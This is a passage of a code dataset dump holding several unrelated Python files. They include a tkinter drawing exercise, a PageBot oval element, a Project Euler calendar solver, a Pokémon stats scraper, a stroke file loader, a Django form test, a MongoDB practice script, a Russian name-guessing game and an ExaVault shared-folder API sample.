use\r\n\r\nradi=math.radians(0+di+(i))\r\nright=math.radians(0+di+(i)+90)\r\nleft=math.radians(0+di+(i)-90)\r\n\r\nv_rcos=(rad-4)*math.cos(radi)\r\nv_rsin=(rad-4)*math.sin(radi)\r\n#cir_ptr= canvas.create_oval(p+x-dotsize,y-dotsize,p+x+dotsize,y+dotsize,fill='green')\r\nr_rcos=p_size*math.cos(right)\r\nr_rsin=p_size*math.sin(right)\r\n#right_ptr= 
canvas.create_oval(p+x+r_rcos-dotsize,y+r_rsin-dotsize,p+x+r_rcos+dotsize,y+r_rsin+dotsize,fill='gold')\r\nl_rcos=p_size*math.cos(left)\r\nl_rsin=p_size*math.sin(left)\r\n#left_ptr= canvas.create_oval(p+x+l_rcos-dotsize,y+l_rsin-dotsize,p+x+l_rcos+dotsize,y+l_rsin+dotsize,fill='gold')\r\nrcos=rad*math.cos(radi)\r\nrsin=rad*math.sin(radi)\r\n#cir_ptr= canvas.create_oval(p+x+v_rcos-dotsize,y+v_rsin-dotsize,p+x+v_rcos+dotsize,y+v_rsin+dotsize,fill='red')\r\n\r\n\r\nx1=p+x+v_rcos\r\ny1= y+v_rsin\r\nx2=p+x+v_rcos\r\ny2= y+v_rsin\r\n\r\nRR_rcos=pp_size*math.cos(right)\r\nRR_rsin=pp_size*math.sin(right)\r\n#cir_ptr= canvas.create_oval(x1+RR_rcos-2,y1+RR_rsin-2,x2+RR_rcos+2,y2+RR_rsin+2,fill='blue')\r\n\r\nRL_rcos=pp_size*math.cos(left)\r\nRL_rsin=pp_size*math.sin(left)\r\n#cir_ptr= canvas.create_oval(x1+RL_rcos-2,y1+RL_rsin-2,x2+RL_rcos+2,y2+RL_rsin+2,fill='white')\r\n\r\npoints = [ x1+RL_rcos,y1+RL_rsin , x1+RR_rcos,y1+RR_rsin , p+x+r_rcos,y+r_rsin , p+x+l_rcos,y+l_rsin ]\r\ntriangle = canvas.create_polygon(points,fill='black')\r\ncentral_dot(Ox,Oy,\"white\")#for temp use\r\n\r\n\r\n\r\nlabel_var = tk.StringVar()\r\nlabel_var.set(\"test\")\r\ntest_String = tk.Label(main_window,textvariable = label_var, bg='yellow')\r\ntest_String.place(x=350,y=220)\r\n\r\ndef clickOK():\r\n label_var.set(index.get())\r\n #circle_frame(Ox,Oy)\r\n #central_dot(Ox,Oy,int(index.get()))\r\n \r\nbutton = tk.Button(main_window,text=\"ENTER\",command=clickOK)\r\n\r\nindex = tk.Entry(main_window,width=5)\r\nindex.place(x=350,y=240)\r\nbutton.place(x=350,y=260)\r\n\r\n\r\n\r\n\r\nmain_window.resizable(0,0)\r\nmain_window.mainloop()\r\n\r\n\r\n#frame=tk.PhotoImage(file='R:/12345.png')\r\n#ptr_1=tk.PhotoImage(file='R:/pointer.png')\r\n#label_f=tk.Label(main_window,image=frame)\r\n#label_f.frame=frame\r\n#label_f.place(x=10,y=30) \r\n#label_p1 = tk.Label(main_window,image=ptr_1)\r\n#label_p1.frame=ptr_1\r\n#label_p1.place(x=78,y=70)\r\n","sub_path":"抄表練習程式Beta3.py","file_name":"抄表練習程式Beta3.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"549249420","text":"# -*- coding: UTF-8 -*-\n# -----------------------------------------------------------------------------\n#\n# P A G E B O T\n#\n# Copyright (c) 2016+ Buro Petr van Blokland + Claudia Mens & Font Bureau\n# www.pagebot.io\n# Licensed under MIT conditions\n# Made for usage in DrawBot, www.drawbot.com\n# -----------------------------------------------------------------------------\n#\n# oval.py\n#\nfrom __future__ import division # Make integer division result in float.\nfrom drawBot import oval\n\nfrom pagebot import setStrokeColor, setFillColor\nfrom pagebot.style import NO_COLOR\nfrom pagebot.elements.element import Element\nfrom pagebot.toolbox.transformer import pointOffset\n\nclass Oval(Element):\n\n def draw(self, origin, view):\n\n p = pointOffset(self.oPoint, origin)\n p = self._applyScale(p) \n px, py, _ = p = self._applyAlignment(p) # Ignore z-axis for now.\n \n self.drawFrame(p, view) # Draw optional frame or borders.\n \n if self.drawBefore is not None: # Call if defined\n self.drawBefore(self, p, view)\n\n setFillColor(self.css('fill', NO_COLOR))\n setStrokeColor(self.css('stroke', NO_COLOR), self.css('strokeWidth'))\n oval(px, py, self.w, self.h)\n\n # If there are child elements, draw them over the text.\n self._drawElements(p, view)\n\n if self.drawAfter is not None: # Call if defined\n self.drawAfter(self, p, view)\n\n self._restoreScale()\n 
view.drawElementMetaInfo(self, origin)\n","sub_path":"Lib/pagebot/elements/pboval.py","file_name":"pboval.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"400507119","text":"DAYS_OF_WEEK = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday' ]\nD30_MONTHS = [4, 6, 9, 11]\nD31_MONTHS = [1, 3, 5, 7, 8, 10, 12]\n\nclass State(object):\n def __init__(self, s_day, s_month, s_year, day_of_week):\n self.nb_days = 1\n self.nb_sundays_first_of_month = 0\n self.day_of_week = day_of_week\n self.c_day = s_day\n self.c_month = s_month\n self.c_year = s_year\n\n def step_until(self, e_day, e_month, e_year):\n while True:\n self.step_one_day()\n if self.is_sunday_first_of_month():\n self.nb_sundays_first_of_month += 1\n print(\"{0}: {1}/{2}/{3}\".format(self.nb_sundays_first_of_month, self.c_day, self.c_month, self.c_year))\n #print(\"{0}/{1}/{2}\".format(self.c_day, self.c_month, self.c_year))\n if (self.c_day == e_day\n and self.c_month == e_month\n and self.c_year == e_year):\n break\n\n def step_one_day(self):\n self.nb_days += 1\n self.day_of_week = (self.day_of_week + 1) % 7\n self.c_day += 1\n\n if self.c_day > nb_days_in_month(self.c_month, self.c_year):\n self.c_day = 1\n self.c_month += 1\n\n if self.c_month == 13:\n self.c_month = 1\n self.c_year += 1\n\n def is_sunday_first_of_month(self):\n if self.day_of_week == 0 and self.c_day == 1:\n #print(\"+1\")\n return True\n else:\n return False\n\ndef nb_days_in_month(month, year):\n if month in D30_MONTHS:\n return 30\n elif month in D31_MONTHS:\n return 31\n else:\n if is_leap_year(year):\n return 29\n else:\n return 28\n\ndef is_leap_year(year):\n if year % 100 == 0:\n if year % 400 == 0:\n return True\n else:\n return False\n elif year % 4 == 0:\n return True\n else:\n return False\n\n\ndef task19():\n c = 0\n for year in range(1901, 2001):\n for month in range(1, 13):\n c += datetime.datetime(year,month, 1).weekday()==6\n return c\n\n\nif __name__ == '__main__':\n s = State(1, 1, 1901, 2)\n s.step_until(31, 12, 2000)\n #s.step_until(31, 1, 1901)\n print(s.nb_sundays_first_of_month)\n","sub_path":"Python/p19.py","file_name":"p19.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"102983220","text":"# -*- coding: latin-1 -*-\n\nimport math\nimport re\nimport requests\nimport time\nfrom lxml import html\n\nfrom forms import Stat, AddedPokes, FormConfig\nfrom parser import Parser\nfrom substitution import attack_substitution, ability_substitution, type_substitution\nfrom util import namesies, remove_prefix, remove_empty, index_swap, get_types, normalize_form, replace_special, dashy\n\n\ndef get_base_exp_map():\n page = requests.get('https://bulbapedia.bulbagarden.net/wiki/List_of_Pok%C3%A9mon_by_effort_value_yield')\n tree = html.fromstring(page.text)\n\n table = tree.xpath('//*[@id=\"mw-content-text\"]/table[1]/tr')\n base_exp_map = {}\n for i, row in enumerate(table):\n # Schema\n if i == 0:\n continue\n\n num = row[0].text_content().strip()\n base_exp = int(row[3].text_content().replace(\"*\", \"\").strip())\n\n # First one is likely the base form\n if num in base_exp_map:\n continue\n\n base_exp_map[num] = base_exp\n\n # Meltan/Melmetal aren't in this page yet\n base_exp_map['808'] = 135\n base_exp_map['809'] = 270\n\n return base_exp_map\n\n\nwith open(\"../temp.txt\", \"w\") as f:\n start_time = time.time()\n\n 
base_exp_map = get_base_exp_map()\n for num in range(1, list(AddedPokes)[-1].value + 1):\n# for num in [1]:\n form_config = FormConfig(num)\n parser = Parser(form_config.lookup_num)\n\n info_index = 2\n if form_config.is_mega:\n # First row is Mega Evolution title\n info_index += 1\n assert parser.update_table(form_config.mega_name)\n\n # Picture, Name, Other Names, No., Gender Ratio, Type\n row = parser.info_table.xpath('tr[' + str(info_index) + ']')[0]\n\n form_config.lookup_name = row.xpath('td[2]')[0].text\n if form_config.name is None:\n form_config.name = form_config.lookup_name\n name = form_config.name\n print(\"#\" + str(num).zfill(3) + \" Name: \" + name)\n\n male_ratio = row.xpath('td[5]')[0]\n\n # Genderless Pokemon\n if male_ratio.text is not None:\n male_ratio = -1\n else:\n # Remove the % from the end and convert to float\n male_ratio = float(male_ratio.xpath('table/tr[1]/td[2]')[0].text[:-1])\n if male_ratio > 50:\n male_ratio = math.floor(male_ratio)\n else:\n male_ratio = math.ceil(male_ratio)\n\n # Silcoon/Beautifly, Gardevoir are 100% female now\n if num in [266, 267, 282]:\n assert male_ratio == 50\n male_ratio = 0\n # Cascoon/Dustox, Glalie are 100% male now\n elif num in [268, 269, 362]:\n assert male_ratio == 50\n male_ratio = 100\n\n print(\"Male Ratio: \" + str(male_ratio))\n\n types_cell = row.xpath('td[6]')[0]\n types = types_cell.xpath('a/img')\n if len(types) > 0:\n types = get_types(types)\n # Multiple forms\n else:\n types = None\n forms = types_cell.xpath('table[1]/tr')\n for form in forms:\n type_form_name = normalize_form(form[0].text)\n if type_form_name == form_config.type_form_name:\n types = get_types(form[1].xpath('a/img'))\n break\n\n types = type_substitution(num, types)\n type1 = types[0]\n type2 = types[1]\n\n print(\"Type1: \" + type1)\n print(\"Type2: \" + type2)\n\n # Next row of the info table (skip two for the schema of the row)\n # Classification, Height, Weight, Capture Rate, Base Egg Steps\n info_index += 2\n row = parser.info_table.xpath('tr[' + str(info_index) + ']')[0]\n\n # Hoopa apparently has a different classification for its different forms\n if num == 720:\n classification = 'Mischief'\n # Remove the Pokemon text from the end of classification\n else:\n classification = row.xpath('td[1]')[0].text[:-8]\n print(\"Classification: \" + classification)\n\n # Height is specified in ft'in'' format -- convert to inches\n height = row.xpath('td[2]')[0].text\n height = height.split(\"/\")\n height_index = form_config.form_index\n if len(height) <= height_index:\n height_index = 0\n height = height[height_index].strip()\n height = height.split(\"'\")\n assert len(height) == 2\n height = int(height[0]) * 12 + int(height[1].replace('\"', ''))\n print(\"Height: \" + str(height))\n\n # Remove the lbs from the end of weight\n weight = row.xpath('td[3]')[0].text\n weight = weight.split(\"/\")\n weight_index = form_config.form_index\n if len(weight) <= weight_index:\n weight_index = 0\n weight = weight[weight_index].strip()\n weight = weight[:-3].strip()\n weight = float(weight)\n print(\"Weight: \" + str(weight))\n\n # Minior apparently has different catch rates for its different forms\n if num == 774:\n capture_rate = 30\n else:\n capture_rate = int(row.xpath('td[4]')[0].text)\n print(\"Capture Rate: \" + str(capture_rate))\n\n egg_steps = row.xpath('td[5]')[0].text.replace(\",\", \"\").strip()\n if egg_steps == \"\":\n # Apparently this is a pretty universal base egg step value for legendaries/Pokemon that cannot breed...?\n egg_steps = 30720\n 
egg_steps = int(egg_steps)\n print(\"Egg Steps: \" + str(egg_steps))\n\n if form_config.is_mega and not form_config.use_mega_abilities:\n parser.restore_backup()\n\n assert parser.update_table('Abilities')\n ability1 = None\n ability2 = None\n if form_config.use_abilities_list:\n abilities = parser.info_table.xpath('tr[2]/td/a/b')\n ability1 = abilities[0].text\n\n if len(abilities) >= 2:\n ability2 = abilities[1].text\n else:\n ability2 = \"No_Ability\"\n else:\n all_abilities = parser.info_table.xpath('tr[1]/td')[0].text_content()\n all_abilities = remove_prefix(all_abilities, \"Abilities: \")\n all_abilities = all_abilities.replace(\"(Hidden)\", \"\")\n all_abilities = all_abilities.replace(\"(Hidden Ability)\", \"\")\n all_abilities = re.split(\"\\)\", all_abilities)\n remove_empty(all_abilities)\n for form_abilities in all_abilities:\n form_index = form_abilities.rfind(\"(\")\n if form_index == -1:\n # No form specified -- there should only be the normal form\n assert len(all_abilities) == 1\n assert form_config.normal_form\n else:\n assert len(all_abilities) > 1\n form = form_abilities[form_index + 1:].strip()\n form = normalize_form(form)\n if form_config.form_name != form:\n continue\n form_abilities = form_abilities[:form_index]\n form_abilities = form_abilities.strip()\n abilities = re.split(\"-\", form_abilities)\n if abilities[0].strip() == \"\":\n abilities = abilities[1:]\n ability1 = abilities[0].strip()\n if len(abilities) > 1:\n ability2 = abilities[1].strip()\n else:\n ability2 = \"No_Ability\"\n break\n assert ability1 is not None\n assert ability2 is not None\n\n ability1 = ability_substitution(num, ability1)\n ability2 = ability_substitution(num, ability2)\n if ability1 == 'No_Ability':\n temp_ability = ability1\n ability1 = ability2\n ability2 = temp_ability\n\n print(\"Ability1: \" + ability1)\n print(\"Ability2: \" + ability2)\n\n # Next table -- Experience Growth, Base Happiness, Effort Values Earned, S.O.S. Calling\n parser.restore_backup()\n parser.get_next()\n row = parser.info_table.xpath('tr[4]')[0]\n\n growth_rate = list(row.xpath('td[1]')[0].itertext())[1]\n print(\"Growth Rate: \" + growth_rate)\n\n ev_strings = row.xpath('td[3]')[0].itertext()\n\n # If no form is specified, use this in the mapping\n default_form = \"FormNotSpecified\"\n form = default_form\n ev_map = {}\n ev_map[form] = [0] * 6\n for ev_string in ev_strings:\n ev_index = ev_string.find(\" Point(s)\")\n\n # String doesn't contain EV info -- new form name\n if ev_index == -1:\n form = normalize_form(ev_string)\n assert form not in ev_map\n ev_map[form] = [0] * 6\n continue\n\n ev = ev_string[:ev_index]\n evs = ev_map[form]\n\n stat = ev[2:]\n value = int(ev[0])\n\n if stat == \"HP\":\n evs[Stat.HP.value] = value\n elif stat == \"Attack\":\n evs[Stat.ATTACK.value] = value\n elif stat == \"Defense\":\n evs[Stat.DEFENSE.value] = value\n elif stat == \"Sp. Attack\":\n evs[Stat.SP_ATTACK.value] = value\n elif stat == \"Sp. Defense\":\n evs[Stat.SP_DEFENSE.value] = value\n elif stat == \"Speed\":\n evs[Stat.SPEED.value] = value\n else:\n raise Exception(stat)\n\n if form_config.ev_form_name is None:\n evs = ev_map[default_form]\n if form_config.ev_form_name not in ev_map:\n assert form_config.normal_form or len(ev_map) == 1\n evs = ev_map[default_form]\n else:\n evs = ev_map[form_config.ev_form_name]\n\n # Swap Attack and Sp. 
Attack for Rizardon\n if num == AddedPokes.MEGA_CHARIZARD.value:\n index_swap(evs, Stat.ATTACK.value, Stat.SP_ATTACK.value)\n\n # Add diffs\n evs = [sum(x) for x in zip(evs, form_config.ev_diffs)]\n\n print(\"Effort Values: \" + str(evs))\n\n # Egg Group table\n parser.get_next()\n parser.get_next()\n\n # Gen 1 (not including Mew I guess) plus Meltan line have the Catch/Transfer Candy section\n egg_index = 2\n if form_config.lookup_num < 151 or num in [808, 809]:\n egg_index += 1\n\n egg_group = parser.info_table.xpath('tr[2]/td[' + str(egg_index) + ']')[0]\n if egg_group.text is not None:\n egg_group1 = \"Undiscovered\"\n egg_group2 = \"None\"\n else:\n egg_group1 = egg_group.xpath('table/tr[1]/td[2]/a')[0].text\n egg_group2 = egg_group.xpath('table/tr[2]/td[2]/a')\n\n if len(egg_group2) == 0:\n egg_group2 = \"None\"\n else:\n egg_group2 = egg_group2[0].text\n\n egg_group1 = namesies(egg_group1)\n egg_group2 = namesies(egg_group2)\n\n print(\"Egg Group1: \" + egg_group1)\n print(\"Egg Group2: \" + egg_group2)\n\n if parser.update_table('Flavor Text'):\n flavor_text = parser.info_table.xpath('tr[2]/td[2]')[0].text\n if flavor_text in ['Sun', \"Let's Go, Pikachu!\"]:\n flavor_text = parser.info_table.xpath('tr[2]/td[3]')[0].text\n if flavor_text is None:\n # infoTable.xpath('td[3]')[0].text == 'Ultra Sun' for this case\n flavor_text = parser.info_table.xpath('td[4]')[0].text\n else:\n flavor_text = 'None'\n\n # Replace the special e character in the flavor text\n flavor_text = replace_special(flavor_text)\n print(\"Flavor Text: \" + flavor_text)\n\n print(\"Attacks:\")\n if form_config.normal_form:\n level_up_tables = ['Ultra Sun/Ultra Moon Level Up',\n 'Ultra Sun / Ultra Moon Level Up',\n 'Sun/Moon Level Up',\n 'Sun / Moon Level Up',\n 'Standard Level Up',\n 'Generation VII Level Up',\n 'Let\\'s Go Level Up']\n else:\n suffix = \" - \" + form_config.form_name + \" Form\"\n level_up_tables = ['Ultra Sun/Ultra Moon Level Up' + suffix,\n 'Ultra Sun / Ultra Moon Level Up' + suffix,\n 'Sun/Moon Level Up' + suffix,\n 'Sun / Moon Level Up' + suffix,\n form_config.form_name + \" Form Level Up\"]\n\n assert parser.update_table(*level_up_tables) \n attacks = []\n for i in range(2, len(parser.info_table) - 1, 2):\n level = parser.info_table[i][0].text\n\n if level == 'Evolve':\n level = -1\n elif level == dashy:\n level = 0\n\n attack = parser.info_table[i][1][0].text\n attack = attack_substitution(num, attack)\n if attack is None:\n assert level == 0\n continue\n\n attacks.append(str(level) + \" \" + namesies(attack))\n print(str(int(level)) + \" \" + attack)\n\n print(\"TMS:\")\n tms = []\n if parser.update_table('TM & HM Attacks'):\n schema = parser.info_table[1]\n attack_index = parser.get_schema_index(schema, \"Attack Name\")\n form_index = parser.get_schema_index(schema, \"Form\")\n\n for i in range(2, len(parser.info_table) - 1, 2):\n row = parser.info_table[i]\n\n attack = row[attack_index][0].text\n if attack in [\"Frustration\", \"Return\", \"Quash\"]:\n continue\n\n if not form_config.has_form(row, form_index):\n continue\n\n tms.append(attack)\n print(attack)\n # Manually add Fly for:\n # Butterfree, Beedrill, Venomoth, Scyther, Dragonair, Ledyba line, \n # Natu, Yanma, Gligar, Beautifly, Dustox, Masquerain, Ninjask, \n # Shedinja, Volbeat, Illumise, Mothim, Vespiquen, Garchomp, Yanmega, \n # Gliscor, Emolga, Vivillon, Rowlet line, Vikavolt, Cutiefly line\n if num in [12, 15, 49, 123, 148, 165, 166,\n 177, 193, 207, 267, 269, 284, 291,\n 292, 313, 314, 414, 416, 445, 469,\n 472, 587, 666, 
722, 723, 724, 738, 742, 743]:\n attack = \"Fly\"\n tms.append(attack)\n print(attack)\n\n print(\"Egg Moves:\")\n egg_moves = []\n if parser.update_table('Egg Moves '):\n schema = parser.info_table[1]\n attack_index = parser.get_schema_index(schema, \"Attack Name\")\n\n for i in range(2, len(parser.info_table) - 1, 2):\n row = parser.info_table[i]\n\n attack = row[attack_index][0].text\n if attack == \"Ion Deluge\":\n attack = \"Electrify\"\n elif attack in [\"Helping Hand\", \"Ally Switch\", \"After You\", \"Wide Guard\", \"Quash\", \"Rage Powder\",\n \"Follow Me\", \"Spotlight\"]:\n continue\n\n # This column does not have a name in the schema\n # It is always present since it additionally contains the details\n # For Pokemon with multiple forms, these will additionally be included here\n details_col = row[-1]\n if not form_config.has_form_from_table(details_col):\n continue\n\n egg_moves.append(attack)\n print(attack)\n\n print(\"Move Tutor Moves:\")\n tutor_moves = []\n if parser.update_table('Move Tutor Attacks'):\n table = parser.info_table.xpath('thead/tr')\n\n schema = table[1]\n attack_index = parser.get_schema_index(schema, \"Attack Name\")\n form_index = parser.get_schema_index(schema, \"Form\")\n\n for i in range(2, len(table) - 1, 2):\n row = table[i]\n\n attack = row[attack_index][0].text\n if attack in [\"Helping Hand\", \"After You\", \"Ally Switch\"]:\n continue\n\n if not form_config.has_form(row, form_index):\n continue\n\n tutor_moves.append(attack)\n print(attack)\n if parser.update_table('Ultra Sun/Ultra Moon Move Tutor Attacks'):\n table = parser.info_table.xpath('thead/tr')\n\n schema = table[1]\n attack_index = parser.get_schema_index(schema, \"Attack Name\")\n form_index = parser.get_schema_index(schema, \"Form\")\n\n for i in range(2, len(table) - 1, 2):\n row = table[i]\n\n attack = row[attack_index][0].text\n if attack in [\"Helping Hand\", \"After You\", \"Ally Switch\"]:\n continue\n\n if not form_config.has_form(row, form_index):\n continue\n\n tutor_moves.append(attack)\n print(attack)\n\n # print(\"Transfer Moves:\")\n # if updateTable('Transfer Only Moves '):\n # schema = infoTable[1]\n # attackIndex = getSchemaIndex(schema, \"Attack Name\")\n # methodIndex = getSchemaIndex(schema, \"Method\")\n #\n # startIndex = 2\n # if infoTable[2][0].tag == \"th\":\n # startIndex = 3\n #\n # for i in range(startIndex, len(infoTable) - 1, 2):\n # row = infoTable[i]\n #\n # attack = row[attackIndex][0].text\n # method = row[methodIndex].text\n #\n # if \"Gen VI\" in method:\n # tms.append(attack)\n # print(attack)\n\n # Stats\n if form_config.use_mega_stats:\n # Not sure this will work for all cases -- particularly for multiple megas\n stats_table = [\"Stats - Mega Evolution\"]\n elif form_config.is_alolan:\n stats_table = [\"Stats - Alolan \" + form_config.lookup_name]\n elif not form_config.normal_form:\n stats_table = [\"Stats - \" + form_config.form_name + \" Form\", \"Stats\"]\n else:\n stats_table = [\"Stats\"]\n assert parser.update_table(*stats_table)\n\n stats = [0] * 6\n for i in range(0, len(stats)):\n stats[i] = int(parser.info_table.xpath('tr[3]/td[' + str(2 + i) + ']')[0].text)\n\n # Decrease Absol's attack since it has an evolution now\n if num == 359:\n stats[Stat.ATTACK.value] -= 30\n # Use Charizard's stats with modifications\n if num == AddedPokes.MEGA_CHARIZARD.value:\n index_swap(stats, Stat.ATTACK.value, Stat.SP_ATTACK.value)\n index_swap(stats, Stat.DEFENSE.value, Stat.SP_DEFENSE.value)\n stats[Stat.ATTACK.value] += 10\n stats[Stat.SPEED.value] 
-= 10\n # Use Absol's stats with increase speed\n if num == AddedPokes.MEGA_ABSOL.value:\n stats[Stat.SPEED.value] += 20\n # Decrease mega attack stats\n if num == AddedPokes.MEGA_BANNETTE.value:\n stats[Stat.ATTACK.value] -= 35\n stats[Stat.SP_ATTACK.value] -= 10\n\n print(\"Stats: \" + str(stats))\n\n base_exp = base_exp_map[form_config.base_exp_name]\n if form_config.is_alolan and form_config.base_exp_name + \"A\" in base_exp_map:\n base_exp = base_exp_map[form_config.base_exp_name + \"A\"]\n\n print(\"Base EXP: \" + str(base_exp))\n\n f.write(str(num) + '\\n')\n f.write(str(name) + '\\n')\n\n stats = [str(stat) for stat in stats]\n f.write(' '.join(stats) + '\\n')\n\n if len(str(base_exp)) == 1:\n f.write(\"BASE EXP: \")\n\n f.write(str(base_exp) + '\\n')\n f.write(namesies(growth_rate) + '\\n')\n f.write(namesies(type1) + ' ')\n f.write(namesies(type2) + '\\n')\n\n f.write(str(capture_rate) + '\\n')\n\n evs = [str(ev) for ev in evs]\n f.write(' '.join(evs) + '\\n')\n\n # TODO: Evolutions\n f.write('NONE\\n')\n\n # TODO: Wild Hold Items\n f.write('0\\n')\n\n f.write(str(male_ratio) + '\\n')\n f.write(namesies(ability1) + ' ')\n f.write(namesies(ability2) + '\\n')\n f.write(str(classification) + '\\n')\n f.write(str(height) + ' ')\n f.write(str(weight) + ' ')\n f.write(str(flavor_text) + '\\n')\n f.write(str(egg_steps) + '\\n')\n f.write(str(egg_group1) + ' ')\n f.write(str(egg_group2) + '\\n')\n\n f.write(str(len(attacks)) + '\\n')\n for attack in attacks:\n f.write(attack + '\\n')\n\n f.write(str(len(tms) + len(egg_moves) + len(tutor_moves)) + '\\n')\n for attack in tms:\n f.write(namesies(attack) + '\\n')\n for attack in egg_moves:\n f.write(namesies(attack) + '\\n')\n for attack in tutor_moves:\n f.write(namesies(attack) + '\\n')\n\n f.write('\\n')\n\n end_time = time.time()\n total_seconds = int(end_time - start_time)\n minutes = total_seconds // 60\n seconds = total_seconds % 60\n print(str(minutes) + \" Minutes, \" + str(seconds) + \" Seconds\")\n","sub_path":"scripts/pokescript.py","file_name":"pokescript.py","file_ext":"py","file_size_in_byte":21298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"601928933","text":"from SketchFramework.Stroke import Stroke\nfrom SketchFramework.Point import Point\nfrom Utils import Logger\n\nlogger = Logger.getLogger('StrokeStorage', Logger.DEBUG)\n\n\nclass StrokeStorage(object):\n def __init__(self, filename = \"strokes.dat\"):\n self._fname = filename\n def saveStrokes(self, strokelist):\n fd = open(self._fname, \"w\")\n for strk in strokelist:\n print >> fd, \"#STROKE\"\n for p in strk.Points:\n print >> fd, \" %s %s %s\" % ( p.X, p.Y, p.T)\n print >> fd, \"#ENDSTROKE\"\n logger.debug(\"Saved Stroke with %s points\" % (len(strk.Points)) )\n fd.close()\n def loadStrokes(self):\n fd = open(self._fname, \"r\")\n curPointList = None\n for line in fd.readlines():\n if line.startswith(\"#STROKE\"):\n curPointList = []\n elif line.startswith(\"#ENDSTROKE\"):\n logger.debug(\"Loaded Stroke with %s points\" % (len(curPointList)) )\n yield Stroke(curPointList)\n else:\n fields = line.split()\n assert len(fields) <= 3 and len(fields) > 1, \"Error: ill-formed point\"\n if len(fields) == 2:\n x, y = fields\n t = 0.0\n elif len(fields) == 3:\n x, y, t = fields\n \n curPointList.append(Point(float(x), float(y), float(t)) )\n fd.close()\n\n 
\n","sub_path":"linux/Utils/StrokeStorage.py","file_name":"StrokeStorage.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"223296449","text":"from django.test import SimpleTestCase\nfrom budgetApp.forms import ExpenseForm\n\n\nclass TestForms(SimpleTestCase):\n\n def test_expense_form_valid_data(self):\n form = ExpenseForm(data={\n 'title': 'expenseForm1',\n 'amount': 5000,\n 'category': 'design'\n })\n\n self.assertTrue(form.is_valid())\n\n def test_expense_form_no_data(self):\n form = ExpenseForm(data={})\n\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 3)","sub_path":"budgetApp/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"512174093","text":"from pymongo import MongoClient\nclient = MongoClient('localhost', 27017)\ndb = client.dbsparta\n\nall_songs = list(db.genie.find({'_id' : False}))\nfor song in all_songs:\n artist = song['artist']\n count = list(db.genie.find({'artist':artist}))\n if count > 1:\n print(artist)","sub_path":"python/mongoPrac.py","file_name":"mongoPrac.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"572714362","text":"# Задача 7. Вариант 22. \n# Разработайте систему начисления очков для задачи 6, в соответствии с которой игрок получал бы большее количество баллов за меньшее количество попыток.\n# Nikishin P. S. \n# 20.05.2016\nimport random\nscore=10\nosnivateli = [\"Ромул\", \"Рем\"]\nosn=random.choice(osnivateli)\nprint (\"Здравствуйте! \")\nprint (\"Хочу предложить сыграть вам в интересную игру, правила которой очень просты\")\nprint (\"Вам нужно угадть имя одного из основателей рима,которе загадает компьютер\")\notvet=input(\"Имя одного из основателей рима: \")\nwhile otvet != osn:\n print(\"Неправильно. 
Попробуйте еще раз\")\n otvet = input(\"Имя одного из основателей рима: \")\n score-=5\n if score<=0:\n break\nif otvet == osn:\n print (\"Все верно вы угадали!\")\n print (\"Вы набрали \" +str(score)+ \" очков\")\n\ninput(\"\\nДля выхода нажмите Enter\") \n\n \n\n","sub_path":"PMIa/2015/NIKISHIN_P_S/task_7_22.py","file_name":"task_7_22.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"367891083","text":"import datetime\nimport os\nimport sys\n\nfrom dotenv import load_dotenv\nfrom exavault import ResourcesApi\nfrom exavault import SharesApi\nfrom exavault.models import AddFolderRequestBody\nfrom exavault.models import AddShareRequestBody\nfrom exavault.models import AccessMode\n\n\n##\n# sample_shared_folder.py - Use the SharesApi to create a shared folder with a password\n##\n\n\n##\n# To use this script, add your credentials to a file named .env which is located in the same directory as this script\n#\n# Your API key will be the EV_KEY\n# Your access token will be EV_TOKEN\n# Your account URL will be the address you should use for the API endpoint\n#\n# To obtain your API Key and Token, you'll need to use the Developer page within the web file manager\n# See https://www.exavault.com/developer/api-docs/#section/Obtaining-Your-API-Key-and-Access-Token\n#\n# Access tokens do not expire, so you should only need to obtain the key and token once.\n#\n# Your account URL is determined by the name of your account.\n# The URL that you will use is https://accountname.exavault.com/api/v2/ replacing the \"accountname\" part with your\n# account name\n# See https://www.exavault.com/developer/api-docs/#section/Introduction/The-API-URL\n##\n\nload_dotenv()\nAPI_KEY = os.getenv('EV_KEY')\nACCESS_TOKEN = os.getenv('EV_TOKEN')\nACCOUNT_URL = os.getenv('ACCOUNT_URL')\n\nif __name__ == \"__main__\":\n\n # We are demonstrating the use of the SharesApi, which is used for managing shared folders and receives,\n # as well as for sending files. See our Sharing 101 documentation at\n # https://www.exavault.com/docs/account/05-file-sharing/00-file-sharing-101\n\n # For this demo, we'll create a share for a new folders. If you have an existing file or folder that you want to use\n # for the share, you won't need this step where we use the ResourcesApi to create the folders first.\n #\n # We have to override the default configuration of the API object with an updated host URL so that our code\n # will reach the correct URL for the api. We have to override this setting\n # for each of the API classes we use\n resources_api = ResourcesApi()\n resources_api.api_client.configuration.host = ACCOUNT_URL\n\n try:\n # We will create a new folder for the demo. The folder will have a\n # different name each time you run this script\n folder_path = \"/sample_share_{}\".format(datetime.datetime.today().strftime(\"%Y%m%d_%H%M%S\"))\n\n # API methods that take a JSON body, such as the add_folder method, require us to submit an object with the\n # parameters we want to send to the API. 
